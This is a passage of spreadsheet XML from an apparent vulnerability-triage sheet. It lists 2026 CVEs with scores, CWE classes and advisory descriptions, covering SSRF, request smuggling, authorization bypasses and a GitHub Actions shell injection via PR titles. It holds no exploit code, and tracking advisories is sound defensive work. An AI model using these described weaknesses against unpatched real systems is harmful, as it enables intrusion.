          <t>CVE-2026-62670</t>
        </is>
      </c>
      <c r="C4220" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4220" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4220" s="5" t="inlineStr"/>
      <c r="F4220" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4220" s="5" t="inlineStr"/>
      <c r="H4220" s="5" t="inlineStr"/>
      <c r="I4220" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4220" s="5" t="inlineStr"/>
      <c r="K4220" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4220" s="5" t="inlineStr">
        <is>
          <t>Grav Flex Objects Plugin allows you to build custom collections of objects. Prior to 1.4.3, the Grav Flex Objects Admin Next API requireFlexPermission() method in classes/Api/FlexApiController.php returns without denying access when a directory blueprint omits config.admin.permissions. An authenticated account with only api.access can use the index, show, create, update, delete, export, and media handlers for a permission-less directory even though the core admin.flex-object. authorization fallback would deny the same actions. This issue is fixed in version 1.4.3.</t>
        </is>
      </c>
      <c r="M4220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62670</t>
        </is>
      </c>
    </row>
    <row r="4221">
      <c r="A4221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63187</t>
        </is>
      </c>
      <c r="C4221" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4221" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4221" s="5" t="inlineStr"/>
      <c r="F4221" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4221" s="5" t="inlineStr"/>
      <c r="H4221" s="5" t="inlineStr"/>
      <c r="I4221" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4221" s="5" t="inlineStr"/>
      <c r="K4221" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L4221" s="5" t="inlineStr">
        <is>
          <t>Logto is the modern, open-source auth infrastructure for SaaS and AI apps. From 1.40.1 until 1.41.0, Logto's .github/workflows/commitlint.yml directly interpolated github.event.pull_request.title into the Commitlint on PR title step's inline echo command before piping the title to npx commitlint. A pull request title containing a single quote could terminate the echo string and append arbitrary shell commands on the GitHub Actions runner. The pull_request trigger used a read-only GITHUB_TOKEN and did not expose repository secrets, but injected commands could alter or disrupt the ephemeral workflow execution. This issue is fixed in version 1.41.0.</t>
        </is>
      </c>
      <c r="M4221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63187</t>
        </is>
      </c>
    </row>
    <row r="4222">
      <c r="A4222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63335</t>
        </is>
      </c>
      <c r="C4222" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4222" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4222" s="5" t="inlineStr"/>
      <c r="F4222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4222" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4222" s="5" t="inlineStr"/>
      <c r="I4222" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4222" s="5" t="inlineStr"/>
      <c r="K4222" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4222" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.31.0, inbound AMQP command assembly in src/main/java/com/rabbitmq/client/impl/CommandAssembler.java processes a content-bearing method and header whose remainingBodyBytes value is smaller than a following AMQP.FRAME_BODY payload. CommandAssembler.consumeBodyFrame subtracts the peer-controlled payload length before validating that it fits, drives remainingBodyBytes negative, and throws a raw UnsupportedOperationException instead of MalformedFrameException. A malicious or compromised broker peer can send this malformed sequence on an open nonzero channel to terminate frame processing and close the client connection, causing denial of service for work using that connection. This issue is fixed in version 5.31.0.</t>
        </is>
      </c>
      <c r="M4222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63335</t>
        </is>
      </c>
    </row>
    <row r="4223">
      <c r="A4223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63379</t>
        </is>
      </c>
      <c r="C4223" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4223" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4223" s="5" t="inlineStr"/>
      <c r="F4223" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4223" s="5" t="inlineStr"/>
      <c r="H4223" s="5" t="inlineStr"/>
      <c r="I4223" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J4223" s="5" t="inlineStr"/>
      <c r="K4223" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L4223" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent processes chunked HTTP trailers in http.c through evhttp_read_trailer and merges them into request headers. The fix introduces evhttp_parse_headers_impl_ and a temporary trailer header list. An unauthenticated remote attacker can place security-sensitive fields in trailers so that an upstream proxy and the libevent application interpret different effective headers, enabling header smuggling, authorization bypass, proxy-header spoofing, or cache poisoning. The fix parses trailers into a temporary header list and discards them instead of merging them into req-&gt;input_headers. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M4223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63379</t>
        </is>
      </c>
    </row>
    <row r="4224">
      <c r="A4224" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63642</t>
        </is>
      </c>
      <c r="C4224" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4224" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4224" s="5" t="inlineStr"/>
      <c r="F4224" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4224" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H4224" s="5" t="inlineStr"/>
      <c r="I4224" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4224" s="5" t="inlineStr"/>
      <c r="K4224" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4224" s="5" t="inlineStr">
        <is>
          <t>MagicMirror² is an open source modular smart mirror platform. Prior to 2.37.0, checkArticleUrl in defaultmodules/newsfeed/node_helper.js accepts the CHECK_ARTICLE_URL notification through the unauthenticated Socket.IO namespace /newsfeed and performs fetch(url, { method: "HEAD" }) without validating the attacker-controlled URL. The helper returns ARTICLE_URL_STATUS containing the URL and framing result, providing a response and timing oracle that can identify internal hosts and ports and trigger side effects on services that react to HEAD requests. This issue is fixed in version 2.37.0.</t>
        </is>
      </c>
      <c r="M4224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63642</t>
        </is>
      </c>
    </row>
    <row r="4225">
      <c r="A4225" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63643</t>
        </is>
      </c>
      <c r="C4225" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4225" s="5" t="inlineStr"/>
      <c r="F4225" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4225" s="5" t="inlineStr"/>
      <c r="H4225" s="5" t="inlineStr"/>
      <c r="I4225" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4225" s="5" t="inlineStr"/>
      <c r="K4225" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L4225" s="5" t="inlineStr">
        <is>
          <t>MagicMirror² is an open source modular smart mirror platform. Prior to 2.37.0, the ADD_CALENDAR handler in defaultmodules/calendar/node_helper.js accepts an attacker-controlled URL, authentication data, and selfSignedCert setting through the unauthenticated Socket.IO namespace /calendar. The handler passes these fields to CalendarFetcher, causing a server-side request without SSRF validation and optionally disabling TLS verification. When the response is valid iCal, CALENDAR_EVENTS returns parsed event data to the attacker, allowing internal-service response data to be exfiltrated; other responses still provide a blind request and timing primitive. This issue is fixed in version 2.37.0.</t>
        </is>
      </c>
      <c r="M4225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63643</t>
        </is>
      </c>
    </row>
    <row r="4226">
      <c r="A4226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67278</t>
        </is>
      </c>
      <c r="C4226" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4226" s="5" t="inlineStr"/>
      <c r="F4226" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4226" s="5" t="inlineStr"/>
      <c r="H4226" s="5" t="inlineStr"/>
      <c r="I4226" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4226" s="5" t="inlineStr"/>
      <c r="K4226" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L4226" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS accepts malformed RSA/PKCS#1 v1.5 signatures during X.509 validation. Because its trust store includes an e=3 root CA, an attacker controlling or redirecting an outbound RouterOS TLS connection can use the root’s public certificate - without its private key - to forge a trusted intermediate and issue certificates for arbitrary hostnames, enabling TLS server impersonation.
This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="M4226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67278</t>
        </is>
      </c>
    </row>
    <row r="4227">
      <c r="A4227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69243</t>
        </is>
      </c>
      <c r="C4227" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4227" s="5" t="inlineStr"/>
      <c r="F4227" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4227" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H4227" s="5" t="inlineStr"/>
      <c r="I4227" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J4227" s="5" t="inlineStr"/>
      <c r="K4227" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L4227" s="5" t="inlineStr">
        <is>
          <t>AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to 3.14.2, the HTTP parsers were vulnerable to a request smuggling attack relating to WebSocket upgrades. If using the server-side component, an attacker may be able to execute a request smuggling vulnerability using an edge case in the WebSocket upgrade procedure. A WebSocket upgrade request with a body could cause the parser to switch protocols before the complete request body was received, leaving trailing bytes to be handled as upgraded-protocol or pipelined data rather than normal HTTP body data. This issue is fixed in version 3.14.2.</t>
        </is>
      </c>
      <c r="M4227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69243</t>
        </is>
      </c>
    </row>
    <row r="4228">
      <c r="A4228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70490</t>
        </is>
      </c>
      <c r="C4228" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4228" s="5" t="inlineStr"/>
      <c r="F4228" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4228" s="5" t="inlineStr"/>
      <c r="H4228" s="5" t="inlineStr"/>
      <c r="I4228" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J4228" s="5" t="inlineStr"/>
      <c r="K4228" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4228" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.8 until 0.11.0, the terminal WebSocket route in backend/open_webui/routers/terminals.py authenticated its own first-message JWT and never applied the verified-user role gate that get_verified_user enforces on HTTP terminal routes. An account whose role is pending, including a registered but unapproved account or an account deactivated back to pending, can open an interactive terminal session when at least one terminal server is configured and its access grants cover the account. This loses the account-approval boundary for terminal access while the HTTP terminal routes correctly reject the same account. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M4228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70490</t>
        </is>
      </c>
    </row>
    <row r="4229">
      <c r="A4229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70597</t>
        </is>
      </c>
      <c r="C4229" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4229" s="5" t="inlineStr"/>
      <c r="F4229" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4229" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4229" s="5" t="inlineStr"/>
      <c r="I4229" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J4229" s="5" t="inlineStr"/>
      <c r="K4229" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L4229" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, the check Electron uses on macOS to confirm it was launched by a same-signed parent process could be bypassed by a local process. Apps that enable fuse-based hardening restricting ELECTRON_RUN_AS_NODE and NODE_OPTIONS to same-signed parents rely on this check, and a local attacker could bypass it and run code inside the signed app, inheriting its TCC permissions and keychain access. This issue is fixed in 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M4229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70597</t>
        </is>
      </c>
    </row>
    <row r="4230">
      <c r="A4230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70667</t>
        </is>
      </c>
      <c r="C4230" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4230" s="5" t="inlineStr"/>
      <c r="F4230" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4230" s="5" t="inlineStr"/>
      <c r="H4230" s="5" t="inlineStr"/>
      <c r="I4230" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J4230" s="5" t="inlineStr"/>
      <c r="K4230" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="L4230" s="5" t="inlineStr">
        <is>
          <t>Lemur manages TLS certificate creation. Prior to 1.9.3, _validate_revocation_url in lemur/certificates/verify.py checked the original CRL or OCSP URL but the later request could reach a different destination. The CRL requests.get call followed HTTP redirects without validating each Location target, so a public attacker-controlled URL could redirect to loopback, RFC1918, link-local, or instance-metadata addresses. Validation and connection also performed separate DNS resolutions, creating a time-of-check time-of-use window for DNS rebinding on both CRL and OCSP paths. An operator uploading a certificate through POST /api/1/certificates/upload could therefore induce blind internal requests despite the earlier mitigation. The fix disables redirects and pins validated addresses while preserving the correct Host value. This issue is fixed in version 1.9.3.</t>
        </is>
      </c>
      <c r="M4230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70667</t>
        </is>
      </c>
    </row>
    <row r="4231">
      <c r="A4231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71557</t>
        </is>
      </c>
      <c r="C4231" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4231" s="5" t="inlineStr"/>
      <c r="F4231" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4231" s="5" t="inlineStr"/>
      <c r="H4231" s="5" t="inlineStr"/>
      <c r="I4231" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J4231" s="5" t="inlineStr"/>
      <c r="K4231" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4231" s="5" t="inlineStr">
        <is>
          <t>go-git is an extensible git implementation library written in pure Go. Prior to 5.19.2 and 6.0.0-alpha.5, reference names are not sanitized before being used to construct on-disk paths under the reference storage directory, so a maliciously crafted reference name (for example containing directory-traversal sequences) can cause go-git to write files outside the intended reference storage directory. Versions 5.19.2 and 6.0.0-alpha.5 fix the issue.</t>
        </is>
      </c>
      <c r="M4231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71557</t>
        </is>
      </c>
    </row>
    <row r="4232">
      <c r="A4232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72728</t>
        </is>
      </c>
      <c r="C4232" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4232" s="5" t="inlineStr"/>
      <c r="F4232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4232" s="5" t="inlineStr"/>
      <c r="H4232" s="5" t="inlineStr"/>
      <c r="I4232" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J4232" s="5" t="inlineStr"/>
      <c r="K4232" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L4232" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. Prior to 2026.1.7, an authenticated user could submit specially formed URLs that bypassed the Onebox allowlist and embedded malicious content in a site. This issue is fixed in versions 2026.1.7, 2026.6.2, 2026.7.1, and 2026.8.0-latest.1.</t>
        </is>
      </c>
      <c r="M4232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72728</t>
        </is>
      </c>
    </row>
    <row r="4233">
      <c r="A4233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72916</t>
        </is>
      </c>
      <c r="C4233" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4233" s="5" t="inlineStr"/>
      <c r="F4233" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4233" s="5" t="inlineStr"/>
      <c r="H4233" s="5" t="inlineStr"/>
      <c r="I4233" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J4233" s="5" t="inlineStr"/>
      <c r="K4233" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-918</t>
        </is>
      </c>
      <c r="L4233" s="5" t="inlineStr">
        <is>
          <t>Mastodon is a free, open-source social network server based on ActivityPub. Prior to 4.4.21, 4.5.14, 4.6.4, and 4.7.0-beta.1, PrivateAddressCheck.private_address? in app/lib/private_address_check.rb normalized IPv4-mapped IPv6 addresses but did not recognize IPv4-compatible IPv6 addresses with IPAddr#ipv4_compat?. An attacker could supply an address in the omitted range to bypass the ALLOWED_PRIVATE_ADDRESSES protection and make Mastodon send HTTP requests to loopback interfaces, potentially accessing private resources and services. Exploitation requires a system that supports the obsolete IPv4-compatible IPv6 mechanism. This issue is fixed in versions 4.4.21, 4.5.14, 4.6.4, and 4.7.0-beta.1.</t>
        </is>
      </c>
      <c r="M4233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72916</t>
        </is>
      </c>
    </row>
    <row r="4234">
      <c r="A4234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73411</t>
        </is>
      </c>
      <c r="C4234" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4234" s="5" t="inlineStr"/>
      <c r="F4234" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4234" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4234" s="5" t="inlineStr"/>
      <c r="I4234" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4234" s="5" t="inlineStr"/>
      <c r="K4234" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-200</t>
        </is>
      </c>
      <c r="L4234" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, getEscapeFunction in src/internal/unix/dash.js fails to escape ~ after : or = when applications use the escape or escapeAll APIs on Unix with shell set to dash, or with shell set to true when Dash is the default, and interpolate the result into an assignment prefixed to a command. An attacker who controls the input can supply a value such as :~ to disclose the home-directory path and may change the location on which the command operates. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M4234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73411</t>
        </is>
      </c>
    </row>
    <row r="4235">
      <c r="A4235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73412</t>
        </is>
      </c>
      <c r="C4235" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4235" s="5" t="inlineStr"/>
      <c r="F4235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4235" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4235" s="5" t="inlineStr"/>
      <c r="I4235" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J4235" s="5" t="inlineStr"/>
      <c r="K4235" s="5" t="inlineStr">
        <is>
          <t>CWE-155, CWE-78</t>
        </is>
      </c>
      <c r="L4235" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, this impacts users of Shescape on Unix systems that explicitly configure shell to Zsh, or true when the default shell is Zsh, using the escape and escapeAll. The Zsh options EXTENDED_GLOB and MAGIC_EQUAL_SUBST exacerbate the problem. In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M4235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73412</t>
        </is>
      </c>
    </row>
    <row r="4236">
      <c r="A4236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73530</t>
        </is>
      </c>
      <c r="C4236" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4236" s="5" t="inlineStr"/>
      <c r="F4236" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4236" s="5" t="inlineStr"/>
      <c r="H4236" s="5" t="inlineStr"/>
      <c r="I4236" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4236" s="5" t="inlineStr"/>
      <c r="K4236" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4236" s="5" t="inlineStr">
        <is>
          <t>Flyto2 Core before 2.28.0 contains a server-side request forgery guard bypass vulnerability that allows attackers to reach internal services by supplying URLs using the unblocked IPv6 address `::` which the kernel routes to loopback identically to `0.0.0.0`. Attackers can submit requests or trigger 302 redirects to ` to bypass the private IP range and blocked hostname checks in `is_private_ip()`, reaching services bound to IPv6 loopback across the `http.get`, `http.request`, and `http.batch` modules.</t>
        </is>
      </c>
      <c r="M4236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73530</t>
        </is>
      </c>
    </row>
    <row r="4237">
      <c r="A4237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73557</t>
        </is>
      </c>
      <c r="C4237" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4237" s="5" t="inlineStr"/>
      <c r="F4237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4237" s="5" t="inlineStr"/>
      <c r="H4237" s="5" t="inlineStr"/>
      <c r="I4237" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J4237" s="5" t="inlineStr"/>
      <c r="K4237" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L4237" s="5" t="inlineStr">
        <is>
          <t>vLLM is an inference and serving engine for large language models. From 0.20.2rc0 until 0.26.0, safe_load_prompt_embeds in vllm/renderers/embed_utils.py uses torch.sparse.check_sparse_tensor_invariants, whose process-global save, enable, and restore state can be raced by concurrent prompt_embeds parts submitted to POST /v1/chat/completions through AsyncMultiModalItemTracker.resolve_items, asyncio.gather, and the default executor, allowing an invalid sparse tensor to reach tensor.to_dense despite the CVE-2025-62164 guard when enable_prompt_embeds is enabled. This issue is fixed in version 0.26.0.</t>
        </is>
      </c>
      <c r="M4237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73557</t>
        </is>
      </c>
    </row>
    <row r="4238">
      <c r="A4238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73829</t>
        </is>
      </c>
      <c r="C4238" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4238" s="5" t="inlineStr"/>
      <c r="F4238" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4238" s="5" t="inlineStr"/>
      <c r="H4238" s="5" t="inlineStr">
        <is>
          <t>zenhive:machine_payments_protocol</t>
        </is>
      </c>
      <c r="I4238" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4238" s="5" t="inlineStr"/>
      <c r="K4238" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L4238" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M4238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73829</t>
        </is>
      </c>
    </row>
    <row r="4239">
      <c r="A4239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75168</t>
        </is>
      </c>
      <c r="C4239" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4239" s="5" t="inlineStr"/>
      <c r="F4239" s="5" t="n">
